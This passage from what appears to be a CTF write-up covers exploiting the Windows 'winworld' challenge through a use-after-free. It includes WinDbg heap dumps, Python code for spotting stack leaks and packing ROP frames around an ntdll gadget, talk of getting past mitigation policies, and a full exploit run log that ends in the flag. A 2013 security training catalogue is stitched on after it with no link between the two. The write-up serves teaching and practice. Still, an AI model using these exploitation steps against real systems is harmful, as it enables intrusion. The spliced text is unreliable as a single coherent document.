 17c262d0000 NT Heap
 17c26120000 NT Heap
0:001> !address 17c262d0000 

Usage: Heap
Base Address: 0000017c`262d0000
End Address: 0000017c`26332000
0:001> .for (r $t0 = 17c`262d0000; @$t0 < 17c`26332000; r $t0 = @$t0 + 8) { .if (poi(@$t0) > 3b`b6cfb000 & poi(@$t0) < 3b`b6d00000) { dps $t0 L1 } }
0000017c`262d2d90 0000003b`b6cff174
0000017c`262deb20 0000003b`b6cffbd8
0000017c`262deb30 0000003b`b6cffbc8
0000017c`262deb80 0000003b`b6cffc30
0000017c`2632cf80 0000003b`b6cff5e0
0000017c`2632cfc0 0000003b`b6cff5e0
0000017c`2632d000 0000003b`b6cff5e0
0000017c`2632d1a0 0000003b`b6cff5e0
0000017c`2632d2c0 0000003b`b6cff5e0
0000017c`2632d4e0 0000003b`b6cff5e0
0000017c`2632d600 0000003b`b6cff5e0
0000017c`2632d660 0000003b`b6cff5e0
0000017c`2632d6e0 0000003b`b6cff5e0
0000017c`2632d700 0000003b`b6cff5e0
0:000> dps winworld+1fbd0 L3
00007ff7`9b9ffbd0 0000017c`2632ca80
00007ff7`9b9ffbd8 0000017c`262da050
00007ff7`9b9ffbe0 0000017c`2632cf20

Yes! We indeed still have stack pointers on the default heap, and we can leak an address from that heap at static offsets from our winworld base address.

Now we can just browse heap pages and try to find these stack addresses. For simplicity, my exploit uses a simple heuristic that finds QWORDs located below the heap but above 1`00000000, and interactively asks which one to choose as the stack leak. This can obviously be improved.
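
The heuristic can be sketched as a filter over a dumped heap page. This is an illustration rather than the code from my exploit: the function name is hypothetical and the sample page is assembled from values that appear in this write-up.

```python
import struct

def stack_candidates(page, heap_addr, low=0x100000000):
    """Return the QWORDs in `page` that are above `low` but below `heap_addr`."""
    count = len(page) // 8
    qwords = struct.unpack("<%dQ" % count, page[:count * 8])
    return [q for q in qwords if low < q < heap_addr]

# Sample page built from values seen in this write-up (stack, binary and heap pointers).
sample = struct.pack(
    "<5Q",
    0x3AB7FAF120,      # stack pointer
    0,                 # null
    0x7FF79B9EF700,    # pointer into winworld (above the heap, filtered out)
    0x3AB7FAF4F0,      # stack pointer
    0x18A6EAE84C0,     # heap pointer below the dumped address (false positive)
)
for index, value in enumerate(stack_candidates(sample, heap_addr=0x18A6EAE8B40)):
    print("[%02d] - %#x" % (index, value))
```

Heap pointers below the dumped address also pass the filter, which is why the exploit still asks which candidate to use.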

Next step is to dump the stack until we find the targeted return address, craft our std::string to point to that exact address, and use the “update <id> name ropchain” feature to write a ropchain!

Mitigation policies & ROP

Now that we have both an arbitrary write and the exact address where we can overwrite a saved RIP on the stack, all that is left is to build a ROP chain. Several ideas to do it:

  • VirtualProtect then shellcode
  • LoadLibrary of a library over SMB
  • Execute a shell command (WinExec etc.)
  • Full ROP to read the flag

As mentioned earlier the binary has some of the recent mitigation policies, in our context the following ones are relevant:

  • ProcessDynamicCodePolicy : prevents inserting new executable memory → VirtualProtect will fail
  • ProcessSignaturePolicy : libraries must be signed  → prevents LoadLibrary
  • ProcessImageLoadPolicy : libraries cannot be loaded from a remote location → prevents LoadLibrary over SMB

The two last options are still available. I also wanted to add a call to UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY in the parent AppJailLauncher process – which would prevent winworld from creating new processes – but since it is a console application, spawning winworld also creates a conhost.exe process. Using this mitigation prevents the creation of the conhost.exe process and therefore the application cannot run.

My solution reads the flag directly in the ROP chain. Since I didn’t want to go through all the trouble of CreateFile and Windows handles, I instead used the _sopen_s / _read / puts / _flushall functions located in ucrtbase.dll that have classic POSIX-style file descriptors (aka 0x3).

Looking for gadgets in ntdll we can find a perfect gadget that pops the first four registers used in the x64 calling convention. Interestingly the gadget turns out to be in CFG itself, which was a scary surprise while single stepping through the rop chain…

0:000> u ntdll+96470 L5
00007ffa`89b16470 5a pop rdx
00007ffa`89b16471 59 pop rcx
00007ffa`89b16472 4158 pop r8
00007ffa`89b16474 4159 pop r9
00007ffa`89b16476 c3 ret
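
One call through this gadget can be packed as shown below. This is a sketch rather than the chain from my exploit: `call_frame` is a hypothetical helper, and the function address and argument values in the demo are placeholders.

```python
import struct

def call_frame(pop4_gadget, func, rcx=0, rdx=0, r8=0, r9=0):
    """Pack one gadget-driven call: load the four argument registers, then return into func."""
    # The gadget pops rdx first, then rcx, r8 and r9, so the values go in that order.
    return struct.pack("<6Q", pop4_gadget, rdx, rcx, r8, r9, func)

POP4_GADGET = 0x7FFA89B16470       # ntdll+0x96470 in the run shown above
FAKE_FUNC = 0x7FFA86D00000         # placeholder, not a real function address

# First argument goes in rcx, second in rdx, per the Windows x64 calling convention.
frame = call_frame(POP4_GADGET, FAKE_FUNC, rcx=0x1111, rdx=0x2222, r8=0x3333, r9=0x4444)
print(len(frame), frame.hex())
```

The qword placed right after a frame becomes the called function's return address. The callee is allowed to overwrite the 32 bytes that follow it (the home space for its register arguments), so anything stored there should be treated as clobbered.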

Putting it all together we finally get the following:

Z:\awe\insomnihack\2017\winworld>python getflag remote
[+] Discovering the PRNG seed...
 Clock not synced with server...
[+] Resynced clock, delay of -21 seconds
[+] Found the maze center: (38, 41)
[+] Check the map for people positions
[+] Make sure that LFH is enabled for bucket of sizeof(Person)
6 / 6 ...
[+] Spray 0x100 std::string to force future initialization of pwnrobot->is_conscious
256 / 256 ...
[+] Cloning host, with uninitialized memory this one should have is_conscious...
[+] Removing current friends of pwnrobot...
[+] Moving a guest to the maze center (37, 86) -> (38, 41)...
[+] Moving our host to the maze center (38, 29) -> (38, 41)...
[+] pwnrobot should now be a human... kill him!
[+] Removing all pwnrobot's friends...
7 / 7 ...
[+] Decrement the refcount of pwnrobot's human share_ptr to 0 -> free it
[+] Spray 0x100 std::string to trigger UAF
256 / 256 ...
[+] heap leak: 0x18a6eae8b40
[+] Leaking stack ptr...
[+] Dumping heap @ 0x18a6eae6b40...
[+] Dumping heap @ 0x18a6eae7b40...
[HEAP] 0x18a6eae7b40
 [00] - 0x18a6ea96c72
 [01] - 0x18a6ea9c550
 [02] - 0x18a6ea9e6e0
Use which qword as stack leak?
[+] Dumping heap @ 0x18a6eae8b40...
[HEAP] 0x18a6eae8b40
 [00] - 0x3ab7faf120
 [01] - 0x3ab7faf4f0
 [02] - 0x18a6ea9c550
 [03] - 0x18a6eae84c0
 [04] - 0x18a6eae8560
 [05] - 0x18a6eae8760
Use which qword as stack leak? 1
[+] stack @ 0x3ab7faf4f0
[+] Leaking stack content...
[-] Haven't found saved RIP on the stack. Increment stack pointer...
[-] Haven't found saved RIP on the stack. Increment stack pointer...
[-] Haven't found saved RIP on the stack. Increment stack pointer...
RIP at offset 0x8
[+] Overwrite stack with ROPchain...
[+] Trigger ROP chain...
Better not forget to initialize a robot's memory!

Flag: INS{I pwn, therefore I am!}
[+] Exploit completed.


You can find the full exploit here.

I hope it was useful to those who, like me, are not so used to C++ or Windows exploitation. Again, congratulations to Dragon Sector for solving this task 1h before the end of the CTF!

2013 training catalogue

For 2013, SCRT is once again expanding its catalogue of technical training courses to keep pace with the constantly evolving world of security, notably with courses on application development for mobile devices (COD102 & COD103) and on log management in the context of IT security (FOR102).

The updated list of courses follows below. Feel free to contact us for further information.


INF101 – Fortinet

This course prepares for the first level of Fortinet certification: the FCNSA (Fortinet Certified Network Security Administrator).
Audience: System administrators
Prerequisites: N/A
Course duration: 1 day

INF102 – Securing VMware virtualized infrastructures

This course presents the new risks associated with virtualized architectures, as well as the best practices to adopt when administering these environments.
Audience: System administrators, VMware ESX infrastructure administrators
Prerequisites: Basic knowledge of VMware ESX
Course duration: 1 day

INF103 – Windows 7/2008 security

This course presents the various options and best practices for better securing Microsoft Windows 7 & 2008 systems.
Audience: System administrators, CISOs
Prerequisites: Windows administration
Course duration: 1 day

INF104 – Linux hardening / administration

Through this course, discover the options and tools for securing a Linux server as well as possible.
Audience: CISOs, project managers, system administrators
Prerequisites: Basic notions / knowledge of Linux systems
Course duration: 1 day

INF105 – Security of web architectures

This course presents the fundamentals of web architecture security: security of N-tier architectures, cryptography, equipment related to web architecture security (firewall, IPS, WAF, …), challenges and methods, identity federation protocols, …
Audience: Developers, project managers, system administrators, CISOs
Prerequisites: N/A
Course duration: 1 day

INF203 – Windows security bootcamp

System administrators often have to configure key points of an operating system’s security. Starting from this observation, and to help them better understand the foundations of Windows operating system security, we created this course.
After presenting the foundations of operating system security and the methods for assessing the current state of a system, we cover how to face an attack by understanding it and by securing the system.
Practice is not forgotten, with demonstrations and exercises in virtualized environments to illustrate it all.
Audience: Windows system administrators
Prerequisites: N/A
Course duration: 1 day


HAK101 – Hacking tools and methods – intermediate level

This course aims to teach how to identify and exploit the most common security flaws. Through about ten practical exercises, participants learn to detect and exploit vulnerabilities such as SQL injection or cross-site scripting. They also learn to take advantage of a misconfigured server or to carry out a brute-force attack on a password.
Audience: System/network administrators, CISOs, developers
Prerequisites: Basic knowledge of HTML, SQL and networking
Course duration: 1 day

HAK201 – Hacking tools and methods – expert level

Like Hacking tools and methods – Level 2, this hands-on course aims to teach the detection and exploitation of real vulnerabilities. The theory and exercises (in a lab environment) allow participants to understand and carry out advanced attacks such as buffer overflow exploitation, network interception or attacks on wireless networks.
Audience: System/network administrators, CISOs, developers
Prerequisites: Hacking tools and methods, intermediate level & basic knowledge of HTML, SQL and networking
Course duration: 1 day

HAK102 – New web attacks

This course presents the new attacks that specifically target websites: cross-site request forgery, click-jacking, browser attacks, …
Audience: System administrators, developers, CISOs
Prerequisites: Knowledge of “classic” attacks such as XSS, SQLi, …
Course duration: ½ day

HAK202 – Security of new web technologies

This course presents the new threats and attacks against recent web technologies: Node.js, NoSQL databases, HTML5. It includes practical examples as well as hands-on exercises for carrying out and countering these attacks.
Audience: Developers, project managers
Prerequisites: Basic knowledge of web technologies
Course duration: 1 day


COD101 – Secure coding OWASP

Discover the OWASP Top 10 vulnerabilities, advice and solutions for avoiding these mistakes, along with a series of examples and tips tailored to the languages used by your teams (PHP, Java, C, …).
Audience: Developers, project managers
Prerequisites: Basic knowledge of the selected language
Course duration: ½ to 1 day

COD102 – Secure coding iOS

This course presents the development mistakes that can introduce vulnerabilities when developing applications for the iOS platform, based on the OWASP guidelines as well as our own experience from application audits.
Course duration: ½ day

COD103 – Secure coding Android

This course presents the development mistakes that can introduce vulnerabilities when developing applications for the Android platform, based on the OWASP guidelines as well as our own experience from application audits.
Audience: Developers
Prerequisites: Android development and platform
Course duration: 1 day


FOR101 – Forensics

A course aimed at getting to know the open-source tools used to carry out a forensic analysis.
Audience: CISOs, system administrators
Prerequisites: N/A
Course duration: 1 day

FOR102 – Log management in Depth

This course presents the fundamentals of log management and its integration. It covers forensic analysis, compliance with the ISO27001, PCI-DSS and HIPAA standards, as well as the use of logs for service monitoring, troubleshooting and intrusion detection.
Audience: CISOs, system and network administrators
Prerequisites: N/A
Course duration: 1 day

User awareness

(This course does not belong to a theme; it stands on its own.) The most complex security measures can generally be defeated by attacking the weakest link in the security of your information system: the user. This course, based on demonstrations and concrete examples, aims to give users the right reflexes. The content can be adapted to your expectations: social engineering, malicious code, social networks, mobile users, mobile devices, MiTM attacks, …
Audience: End users
Prerequisites: N/A
Course duration: 2 hours

2013 training calendar